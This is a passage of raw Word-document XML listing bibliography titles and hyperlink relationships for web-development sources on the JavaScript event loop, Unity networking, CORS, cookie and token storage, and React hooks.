        </w:rPr>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JavaScript: Threads, Event Loop, and Execution Model - Medium,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https://medium.com/@differofeveryone/understanding-javascript-threads-event-loop-and-execution-model-31ab27cca2e8</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JavaScript Event Loop — Deep Internals &amp; Spec-Level Breakdown - Medium,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https://medium.com/@s35919223/the-javascript-event-loop-deep-internals-spec-level-breakdown-2add546aac4b</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WebRequest made Simple. HTTP Webrequest unity: | by santosh parihar | Medium,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https://medium.com/@sonusprocks/unity-webrequest-made-simple-92d967a1b86c</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HttpClient and Unity's UnityWebRequest/WWW API - Stack Overflow,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https://stackoverflow.com/questions/50160380/difference-between-httpclient-and-unitys-unitywebrequest-www-api</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Promises, Async/Await, and the Fetch API in JavaScript | by Walid Ezzat,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https://medium.com/@walidelbourdiney25/understanding-promises-async-await-and-the-fetch-api-in-javascript-84b3ca37c3ee</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networking - Unity - Manual,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https://docs.unity3d.com/6000.2/Documentation/Manual/webgl-networking.html</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UnityWebRequest - Unity,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https://docs.unity.cn/560/Documentation/Manual/UnityWebRequest.html</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UnityWebRequest - Unity - Manual,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https://docs.unity3d.com/540/Documentation/Manual/UnityWebRequest.html</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exactly is the difference between the fetch API and a rest API? - Reddit,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https://www.reddit.com/r/learnjavascript/comments/tt3m9o/what_exactly_is_the_difference_between_the_fetch/</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API: Networking.UnityWebRequest.Abort - Unity - Manual,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https://docs.unity3d.com/6000.2/Documentation/ScriptReference/Networking.UnityWebRequest.Abort.html</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AbortController: abort() method - Web APIs - MDN Web Docs,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https://developer.mozilla.org/en-US/docs/Web/API/AbortController/abort</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AbortController with Examples - Never to look back again - DEV Community,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https://dev.to/saurabh_raj_afaabe1844a4c/learn-abortcontroller-with-examples-never-to-look-back-again-38a3</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Cross-Origin Resource Sharing (CORS) | Articles - web.dev,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https://web.dev/articles/cross-origin-resource-sharing</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CORS? - Cross-Origin Resource Sharing Explained - AWS,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https://aws.amazon.com/what-is/cross-origin-resource-sharing/</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Preflight request - Glossary - MDN Web Docs,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https://developer.mozilla.org/en-US/docs/Glossary/Preflight_request</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motivation behind the introduction of preflight CORS requests? - Stack Overflow,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https://stackoverflow.com/questions/15381105/what-is-the-motivation-behind-the-introduction-of-preflight-cors-requests</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CORS and Preflight Requests in APIs | by Bale - Medium,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https://medium.com/@bloodturtle/understanding-cors-and-preflight-requests-in-apis-e088ae13b417</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 Cross-Origin Requests (CORS) in ASP.NET Core | Microsoft Learn,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https://learn.microsoft.com/en-us/aspnet/core/security/cors?view=aspnetcore-10.0</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Middleware | Microsoft Learn,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https://learn.microsoft.com/en-us/aspnet/core/fundamentals/middleware/?view=aspnetcore-10.0</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are built-in middlewares like Cors ordered in the middleware? : r/dotnet - Reddit,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https://www.reddit.com/r/dotnet/comments/1834pqj/how_are_builtin_middlewares_like_cors_ordered_in/</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JWT Storage in React: Local Storage vs Cookies Security Battle - Cyber Sierra,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https://cybersierra.co/blog/react-jwt-storage-guide/</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Token Storage: Local Storage vs HttpOnly Cookies - Wisp CMS,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https://www.wisp.blog/blog/understanding-token-storage-local-storage-vs-httponly-cookies</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HttpOnly - OWASP Foundation,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https://owasp.org/www-community/HttpOnly</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Bypassing SameSite cookie restrictions | Web Security Academy - PortSwigger,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https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions</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SameSite Flag against CSRF - Stack Overflow,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https://stackoverflow.com/questions/65887695/samesite-flag-against-csrf</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Reusing Logic with Custom Hooks - React,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https://react.dev/learn/reusing-logic-with-custom-hooks</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Custom Hooks Library in React - GeeksforGeeks,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https://www.geeksforgeeks.org/reactjs/building-custom-hooks-library-in-react/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wisp.blog/blog/understanding-token-storage-local-storage-vs-httponly-cookies" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@s35919223/the-javascript-event-loop-deep-internals-spec-level-breakdown-2add546aac4b" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/HttpOnly" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/questions/50160380/difference-between-httpclient-and-unitys-unitywebrequest-www-api" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://react.dev/learn/reusing-logic-with-custom-hooks" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@sonusprocks/unity-webrequest-made-simple-92d967a1b86c" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/questions/65887695/samesite-flag-against-csrf" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.unity3d.com/6000.2/Documentation/Manual/webgl-networking.html" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@walidelbourdiney25/understanding-promises-async-await-and-the-fetch-api-in-javascript-84b3ca37c3ee" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.geeksforgeeks.org/reactjs/building-custom-hooks-library-in-rea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dotnet/api/system.threading.threadpool?view=net-10.0" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.unity3d.com/540/Documentation/Manual/UnityWebRequest.html" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.unity.cn/560/Documentation/Manual/UnityWebRequest.html" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.unity3d.com/6000.2/Documentation/ScriptReference/Networking.UnityWebRequest.Abort.html" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.reddit.com/r/learnjavascript/comments/tt3m9o/what_exactly_is_the_difference_between_the_fetch/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CORS" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/API/AbortController/abort" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/questions/34710487/how-does-the-c-sharp-event-loop-compare-to-the-javascript-event-loop" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.dev/articles/cross-origin-resource-sharing" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.to/saurabh_raj_afaabe1844a4c/learn-abortcontroller-with-examples-never-to-look-back-again-38a3" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.theslidefactory.com/post/multi-threaded-web-request-in-unity-using-unitywebrequest-and-unitywebrequestasyncoperation" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Glossary/Preflight_request" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.unity3d.com/6000.2/Documentation/Manual/job-system-overview.html" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://aws.amazon.com/what-is/cross-origin-resource-sharing/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.to/fernandakipper/a-beginners-guide-to-javascripts-single-thread-and-event-loop-1a9h" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@bloodturtle/understanding-cors-and-preflight-requests-in-apis-e088ae13b417" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/questions/31956007/is-the-event-loop-in-javascript-executing-in-a-separate-thread" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/questions/15381105/what-is-the-motivation-behind-the-introduction-of-preflight-cors-requests" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blazity.com/blog/demystifying-javascript-runtime-environment-web-api-task-queue-event-loop" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/aspnet/core/fundamentals/middleware/?view=aspnetcore-10.0" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@codebyaadi/understanding-the-javascript-event-loop-a-deep-dive-7702b8da1e9b" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/aspnet/core/security/cors?view=aspnetcore-10.0" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/questions/25915634/difference-between-microtask-and-macrotask-within-an-event-loop-context" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cybersierra.co/blog/react-jwt-storage-guide/" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.f22labs.com/blogs/what-is-an-event-loop-in-javascript-a-beginner-guide/" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.reddit.com/r/dotnet/comments/1834pqj/how_are_builtin_middlewares_like_cors_ordered_in/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@differofeveryone/understanding-javascript-threads-event-loop-and-execution-model-31ab27cca2e8" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/API/HTML_DOM_API/Microtask_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